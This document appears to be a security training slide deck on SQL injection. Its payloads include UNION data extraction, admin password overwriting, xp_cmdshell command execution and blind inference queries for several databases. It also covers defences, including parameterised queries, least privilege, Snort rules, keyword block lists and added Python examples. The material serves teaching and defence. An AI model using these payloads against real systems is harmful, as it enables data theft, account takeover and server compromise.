SQL INJECTION ATTACKS

Cade Zvavanjanja
CISO
Gainful Information Security




Introduction   Background    Techniques   Prevention   Demo   Conclusions   Questions
OUTLINE
  - Background of SQL Injection
  - Techniques and Examples
  - Preventing SQL Injection
  - Demo
  - Wrap-Up
  - Questions




BACKGROUND OF SQL INJECTION




DATABASES: WHERE ARE THEY NOW?

                  Fat Server   Fat Client   Fat Server & Fat Client
  Mainframes          X
  Desktop Apps                     X
  Web Apps                                          X




WHY IS SQL A STANDARD?

  Relational Database
    - Platform Independence
    - Loose Semantics
    - Runtime Interpretation



FLEXIBILITY = VULNERABILITY
  - Simple Injection
  - Decoding Error Messages
  - Blind Injection
  - Encoding Exploits
  - Stored Procedures
  ---
  - Programmer Error (Faulty Logic)



SQL INJECTION TECHNIQUES



IMPORTANT SYMBOLS

  '       "Hack" (closes a string literal early)
  --      "Comment Out"
  ;       "End Statement"
  %, *    "Wildcards"
SQL INJECTION DEFINITION

  The input field is modified in such a way that the
  database returns unintended data.

  SQL:
      SELECT <column name>
      FROM <table name>
      WHERE <logic expression>
EXAMPLE: DATABASE SCHEMA
  - Table Users
      - Has columns "username" and "password"
      - Accessed when users log in
  - Table Customers
      - Has column "phone"
      - Users can look up other customer phone numbers by name
  - Application does no input validation




RETURNING EXTRA ROWS WITH "UNION"
  Query:
      SELECT phone
      FROM Customers
      WHERE last_name = '<name>'

  Input:
      x' UNION SELECT username FROM users WHERE 'x' = 'x




MODIFYING RECORDS
  - Application has password changing page
  - SQL:
      UPDATE users
      SET password = '<newpassword>'
      WHERE username = '<username>'

  Input:
      newpassword' WHERE username LIKE '%admin%' --




MS SQL SERVER
  - Default SQL Server setup
      - Default system admin account "sa" enabled
      - No password!!!
  - Supports multiple queries
  - "Extended stored procedures": C/C++ DLL files
      - Read/write external files
      - Access command line




EXPLOITING SQL SERVER
  Use phone look-up query again:
      SELECT phone
      FROM customers
      WHERE last_name = '<name>'

  Input:
      '; exec master..xp_cmdshell 'iisreset'; --




DATA-MINING WITH SQL INJECTION

  Three classes of data-mining:
  - In-band
  - Out-of-band
  - Inference
IN-BAND ATTACKS
  - Data is included in the response from the web server
  - Could be a well rendered web page
      - Using UNION SELECTs
  - Error messages
OUT-OF-BAND ATTACKS
  Data is retrieved using another communication channel:
  - UTL_HTTP.REQUEST
  - OPENROWSET
  - XP_SENDMAIL
INFERENCE ATTACKS
  - At the core of inference is a question
  - Action taken based upon the answer

  Chris Anley's time delay:

      declare @s varchar(8000)
      select @s = db_name()
      if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0
         waitfor delay '0:0:5'
INFERENCE ATTACKS...CONT:
  Examples:
  - Time Delay
  - Generate 200/500 responses
  - Response Variation
  - Wildly Silly Example: send mail to tech support of XYZ Corp about a
    modem problem or a monitor problem; if the call comes about a modem
    problem we know the answer
INFERENCE ATTACKS...CONT:
  CASE statements in SQL:

      SELECT CASE
        WHEN condition
        THEN do_one_thing
        ELSE do_another END
INFERENCE THROUGH WEB SERVER RESPONSE CODES
  Need a query that will compile fine but generate an error on branch execution:

      SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
INFERENCE THROUGH WEB SERVER RESPONSE CODES...CONT:

  Notes:
  - Works well with SQL Server, Oracle, DB2
  - MySQL returns NULL
  - Informix ODBC driver returns 200, even in the event of an error
  - Response code could be 302 Redirect, etc.; the principle is the same
  - Leaves a large number of 500 responses in log files
  - App environments like PL/SQL will return 404 instead of 500
INFERENCE THROUGH RESPONSE VARIATIONS:
  - Parameter Splitting and Balancing
  - Avoids 500 responses
PARAMETER SPLITTING AND BALANCING
  'NGSSOFTWARE'
    - 'NGSSOFTWA'+'RE'
    - 'NGSSOFTWA'||'RE'
    - 'NGSSOFTWA'|| (SUBSELECT RETURNS R) || 'E'
    - 'NGSSOFTWA' + (SUBSELECT RETURNS R) + 'E'

  2
    - 1 + 1
    - 1 + (SUBSELECT RETURNS 1)
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS
  - Cold Fusion Management
      - Converts " to &quot;
      - Converts & to &amp;
      - Converts > to &gt;
      - Converts < to &lt;
      - Doubles up single quotes
          - Usually means attack vector is numeric input
  - PHP often doubles single quote (magic quotes)
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS...CONT:
  - Rather than > use BETWEEN X AND Y
  - Rather than & use ^
      A xor BIT = C
        - if C is greater than A then Bit is not set
        - if C is less than A then Bit is set
  - Rather than 'A' use CHR(65)/CHAR(65)
INFERENCE QUERIES...
  SQL Server - String data

      ' + (select case when
             ascii(substring((sub-query),the_byte,1))^the_bit
             between 0 and ascii(substring((sub-query),the_byte,1))
           then char(known_value) else char(1/0) end) + '
INFERENCE QUERIES...
  Oracle - Numeric

      + (select case when
             bitand(ascii(substr((sub-query),the_byte,1)), the_bit)
             between 1 and 255
           then 0 else 1/0 end
         from dual)
INFERENCE QUERIES...
  Oracle - String data

      '|| (select case when
             bitand(ascii(substr((sub-query),the_byte,1)), the_bit)
             between 1 and 255
           then chr(known_val) else chr(1/0) end
         from dual) ||'
INFERENCE QUERIES...
  MySQL - Numeric

      + (select case when
             (ascii(substring((sub-query),the_byte,1))^the_bit)
             between 0 and ascii(substring((sub-query),the_byte,1))
           then 0 else 1 end)

  (uses page response variation)
INFERENCE QUERIES...
  MySQL - String Data

      ' + (select case when
             (ascii(substring((sub-query),the_byte,1))^the_bit)
             between 0 and ascii(substring((sub-query),the_byte,1))
           then 0 else 1 end) + '

  (one returns no recordset; the other returns all rows)
INFERENCE QUERIES...
  Informix - Numeric

      + (select distinct case when bitval((SELECT distinct
          DECODE((select distinct (substr((sub-query),the_byte,1))
                  from sysmaster:informix.systables),
                 "{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,
                 "*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,
                 "",92,".",46,"?",63,"-",45,
                 "0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,
                 "@",64,
                 "A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,
                 "J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,
                 "S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,
                 "a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,
                 "j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,
                 "s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,
                 63)
          from sysmaster:informix.systables), the_bit) between 1 and 255
         then 1 else (1/bitval(2,1)) end
         from sysmaster:informix.systables)-1
INFERENCE QUERIES...
  Informix - String data

      ' || (select distinct case when bitval((SELECT distinct
          DECODE((select distinct (substr((sub-query),the_byte,1))
                  from sysmaster:informix.systables),
                 "{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,
                 "*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,
                 "",92,".",46,"?",63,"-",45,
                 "0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,
                 "@",64,
                 "A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,
                 "J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,
                 "S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,
                 "a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,
                 "j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,
                 "s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,
                 63)
          from sysmaster:informix.systables), the_bit) between 1 and 255
         then 'xFC' else (1/bitval(2,1))::char end
         from sysmaster:informix.systables) ||'
PREVENTING SQL INJECTION




PREVENTING SQL INJECTION

  - Input Validation
  - Input Checking Functions
  - Access Rights
  - User Permissions
  - Variable Placeholders
  - Stored Procedures

INPUT VALIDATION
  - Checks
      - Type
      - Size
      - Format
      - Range
  - Replace quotation marks

  "All input is wrong and dangerous"




INPUT CHECKING FUNCTIONS
  - Built-in character rejection

      // Vulnerable: the raw request parameter is concatenated into the query text
      $sql = "SELECT * FROM Users WHERE ID = '" . $_GET['id'] . "'";

      // Escaped: quotes and other special characters in the input are escaped,
      // and the escaped value is itself quoted so it is compared as a string
      $sql = "SELECT * FROM Users WHERE ID = '" . mysql_real_escape_string($_GET['id']) . "'";
      $result = mysql_query($sql);

ACCESS RIGHTS

  Web User
    vs.
  System Administrator ('sa')




USER PERMISSIONS
  - Limit query access rights
      - SELECT
      - UPDATE
      - DROP
  - Restricted statement access
      - Global-specific
      - Database-specific
      - Table-specific




VARIABLE PLACEHOLDERS (?)
  - Defense from String Concatenation
  - Enforcing database data types

      PreparedStatement prep =
          conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?");
      prep.setString(1, pwd);
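The following is an added example, not code from the deck, written in Python with SQLite rather than the deck's PHP and Java. It builds the Users/Customers schema from the EXAMPLE: DATABASE SCHEMA slide, writes the phone look-up once by concatenation (the pattern the INPUT CHECKING FUNCTIONS slide starts from) and once with a placeholder (this slide), and adds a whitelist type/size/format/range check for a numeric ID as the INPUT VALIDATION slide lists. The table contents and the ID limits are constructed assumptions.

```python
# Added example (not from the deck): the deck's Users/Customers schema in SQLite,
# the phone look-up written by concatenation and then with a placeholder, and a
# whitelist check for a numeric ID parameter.
import re
import sqlite3

# Constructed sample data matching the schema on the EXAMPLE: DATABASE SCHEMA slide.
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
CREATE TABLE customers (last_name TEXT, phone TEXT);
INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2');
INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0199');
"""

# The deck's own UNION input, used here only to compare how the two queries react.
UNION_INPUT = "x' UNION SELECT username FROM users WHERE 'x' = 'x"


def open_db():
    """In-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_concat(conn, name):
    """Vulnerable form: the value is pasted into the SQL text, so a quote in the
    input closes the literal and everything after it is parsed as SQL."""
    sql = "SELECT phone FROM customers WHERE last_name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, name):
    """Hardened form: '?' is a placeholder; the driver hands the value to the
    engine separately, so it is compared as data and never parsed as SQL."""
    sql = "SELECT phone FROM customers WHERE last_name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


# ASCII digits only: str.isdigit() would also accept non-ASCII digit characters.
ID_FORMAT = re.compile(r"[0-9]+")


def validate_id(raw, max_len=10, lo=1, hi=10**9):
    """Whitelist check for a numeric ID in the order the INPUT VALIDATION slide
    lists (type, size, format, range). Returns the int or raises ValueError
    naming the check that failed. The limits are assumptions."""
    if not isinstance(raw, str):
        raise ValueError("type")
    if len(raw) > max_len:
        raise ValueError("size")
    if not ID_FORMAT.fullmatch(raw):
        raise ValueError("format")   # rejects quotes, spaces, '--', signs, letters
    value = int(raw)
    if not lo <= value <= hi:
        raise ValueError("range")
    return value


def rejection_reason(raw):
    """Name of the check that rejected raw, or None if it is acceptable."""
    try:
        validate_id(raw)
    except ValueError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = open_db()
    print("concat  :", lookup_concat(db, UNION_INPUT))  # returns usernames, not phones
    print("param   :", lookup_param(db, UNION_INPUT))   # no such last name: []
    print("id check:", rejection_reason("42'"))          # format
```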




STORED PROCEDURES
  - Use error checking variables
  - Buffer direct database access




DEMONSTRATION




COUNTERMEASURES
  - System Administrators
      - White List / Blacklist Input Validation
      - Least Privileges
      - Application firewalls
  - Developer
      - Stored Procedures
      - Parameterized queries
      - Exception handling
WHITELIST INPUT VALIDATION
  - UrlScan v3.0
      - Restricts the types of HTTP requests that IIS will process

          [SQL Injection Headers]
          AppliesTo=.asp,.aspx

          [SQL Injection Headers Strings]
          --
          @ ; also catches @@
          alter
          delete
          drop
          exec
          insert

  - SNORT
      - Create rule to check for SQL attack

          alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
            (msg:"SQL Injection "; flow:to_server,established;
            uricontent:".php | .aspx | .asp";
            pcre:"/(%27)|(')|(--)|(%23)|(#)/i";
            classtype:Web-application-attack; sid:9099; rev:5;)
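The following is an added example, not from the deck, showing what the Snort rule above detects when its pcre pattern is run over web-server access-log lines, and also counting HTTP 500 responses per client, which the earlier inference-attack notes say pile up in the log files. The combined log format, the sample lines and the 500 threshold are constructed assumptions; the uricontent scoping is approximated with a file-extension match.

```python
# Added example (not from the deck): apply the Snort rule's pcre pattern to
# constructed access-log lines, limited to script requests as the rule's
# uricontent intends, and count HTTP 500 responses per client.
import re
from collections import Counter

# The pattern from the deck's Snort rule: raw or URL-encoded quote, comment, hash.
SQLI_PCRE = re.compile(r"(%27)|(')|(--)|(%23)|(#)", re.IGNORECASE)
# Approximates the rule's uricontent scoping to .php/.aspx/.asp requests.
SCRIPT_EXT = re.compile(r"\.(php|aspx|asp)(\?|$)", re.IGNORECASE)
# Assumed combined log line: client - - [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (not real traffic). 10.0.0.9 sends the deck's UNION
# input and then three quote/comment probes that each end in a 500; 10.0.0.8 is
# a legitimate search for a surname containing an apostrophe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2024:10:00:01 +0000] "GET /phone.asp?name=Smith HTTP/1.1" 200 512
10.0.0.9 - - [01/May/2024:10:00:02 +0000] "GET /phone.asp?name=x%27%20UNION%20SELECT%20username%20FROM%20users%20WHERE%20%27x%27=%27x HTTP/1.1" 200 2048
10.0.0.9 - - [01/May/2024:10:00:03 +0000] "GET /phone.asp?name=a%27-- HTTP/1.1" 500 310
10.0.0.9 - - [01/May/2024:10:00:04 +0000] "GET /phone.asp?name=b%27-- HTTP/1.1" 500 310
10.0.0.9 - - [01/May/2024:10:00:05 +0000] "GET /phone.asp?name=c%27-- HTTP/1.1" 500 310
10.0.0.7 - - [01/May/2024:10:00:06 +0000] "GET /static/logo.png HTTP/1.1" 200 9001
10.0.0.8 - - [01/May/2024:10:00:07 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 780
"""


def parse_line(line):
    """Split one log line into client, method, path and status; None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, path, status = m.groups()
    return {"client": client, "method": method, "path": path, "status": int(status)}


def flag_sqli(lines):
    """(client, path) for each request the Snort pattern would alert on.
    Expect false positives: a legitimate apostrophe trips the (%27)/(') branch."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and SCRIPT_EXT.search(rec["path"]) and SQLI_PCRE.search(rec["path"]):
            hits.append((rec["client"], rec["path"]))
    return hits


def count_500s(lines):
    """HTTP 500 responses per client."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 500:
            counts[rec["client"]] += 1
    return counts


def noisy_clients(lines, threshold=3):
    """Clients at or above the 500-response threshold (an assumed value), sorted."""
    return sorted(c for c, n in count_500s(lines).items() if n >= threshold)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for client, path in flag_sqli(lines):
        print("pattern hit:", client, path)
    print("500 bursts :", noisy_clients(lines))
```

The O%27Brien hit shows why the rule's bare quote alternative needs tuning or a second signal (such as the 500 count) before it is worth an alert.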
LEAST PRIVILEGES
  - Enforce least privileges
      - CREATE / DELETE
      - Does not guarantee security
  - Access to portion of data
      - Create views
CONCLUSIONS
  - SQL Injection continues to evolve with new technologies
  - Dangerous Effects
      - Access to critical information
      - Updating data not meant to be updated
      - Exploiting DBMS to directly affect the server and its resources
  - Prevention of SQL Injection
      - Input Validation and Query Building
      - Permissions and Access Rights
      - Variable Placeholders (Prepare) and Stored Procedures


QUESTIONS
  1) What could prevent the 'Students' table from being dropped?
  2) What is another way to prevent Injection?




Thank You

  Tel: +236 733 782 490
       +263 773 796 365
       +263 -4- 733 117

  Eml: info@gis.co.zw
       cade@gis.co.zw

  Web: www.gis.co.zw





Contenu connexe

Tendances

A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
Sina Manavi
 

Tendances (20)

Sql injection
Sql injectionSql injection
Sql injection
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
 

En vedette

Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
أحلام انصارى
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
Rich Helton
 

En vedette (16)

Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
 
SQL injection and SYN attack
SQL injection and SYN attackSQL injection and SYN attack
SQL injection and SYN attack
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 
Web Application Security II - SQL Injection
Web Application Security II - SQL InjectionWeb Application Security II - SQL Injection
Web Application Security II - SQL Injection
 
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web SiteFrom SQL Injection & XSSProtecting Your Web SiteFrom SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A  Heads UpSQLMAP Tool Usage - A  Heads Up
SQLMAP Tool Usage - A Heads Up
 

Similaire à Web application attacks using Sql injection and countermasures

Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
badhanbd
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).ppt
ssuserde23af
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
webhostingguy
 
SQLCLR For DBAs and Developers
SQLCLR For DBAs and DevelopersSQLCLR For DBAs and Developers
SQLCLR For DBAs and Developers
webhostingguy
 
Dr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. HydeDr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. Hyde
webhostingguy
 
Mutant Tests Too: The SQL
Mutant Tests Too: The SQLMutant Tests Too: The SQL
Mutant Tests Too: The SQL
DataWorks Summit
 

Similaire à Web application attacks using Sql injection and countermasures (20)

Sql
SqlSql
Sql
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Sql injection
Sql injectionSql injection
Sql injection
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).ppt
 
Php classes in mumbai
Php classes in mumbaiPhp classes in mumbai
Php classes in mumbai
 
Designer's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServerDesigner's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServer
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data Leakeage
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access  from Programming LanguagesAdvanced SQL - Database Access  from Programming Languages
Advanced SQL - Database Access from Programming Languages
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
SQLCLR For DBAs and Developers
SQLCLR For DBAs and DevelopersSQLCLR For DBAs and Developers
SQLCLR For DBAs and Developers
 
Dr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. HydeDr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. Hyde
 
Mutant Tests Too: The SQL
Mutant Tests Too: The SQLMutant Tests Too: The SQL
Mutant Tests Too: The SQL
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 

Plus de Cade Zvavanjanja

Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1
Cade Zvavanjanja
 
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Cade Zvavanjanja
 

Plus de Cade Zvavanjanja (10)

Cade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security onlineCade zvavanjanja saigf cybercrime &amp; security online
Cade zvavanjanja saigf cybercrime &amp; security online
 
Cade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf onlineCade zvavanjanja iot afigf online
Cade zvavanjanja iot afigf online
 
comesa cybersecurity
comesa cybersecuritycomesa cybersecurity
comesa cybersecurity
 
Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1Cyber Security 2016 Cade Zvavanjanja1
Cyber Security 2016 Cade Zvavanjanja1
 
A case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanjaA case for multi-stakeholder cybersecurity by zvavanjanja
A case for multi-stakeholder cybersecurity by zvavanjanja
 
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
Saigf 15 thematic-paper 7 - A case for multi-stakeholder partnerships for cri...
 
Cloud computing & service level agreements
Cloud computing & service level agreementsCloud computing & service level agreements
Cloud computing & service level agreements
 
Introduction to IT Security
Introduction to IT SecurityIntroduction to IT Security
Introduction to IT Security
 
Gainful Information Security 2012 services
Gainful Information Security 2012 servicesGainful Information Security 2012 services
Gainful Information Security 2012 services
 
Top online frauds 2010
Top online frauds 2010Top online frauds 2010
Top online frauds 2010
 

Dernier

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 

Dernier (20)

Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 

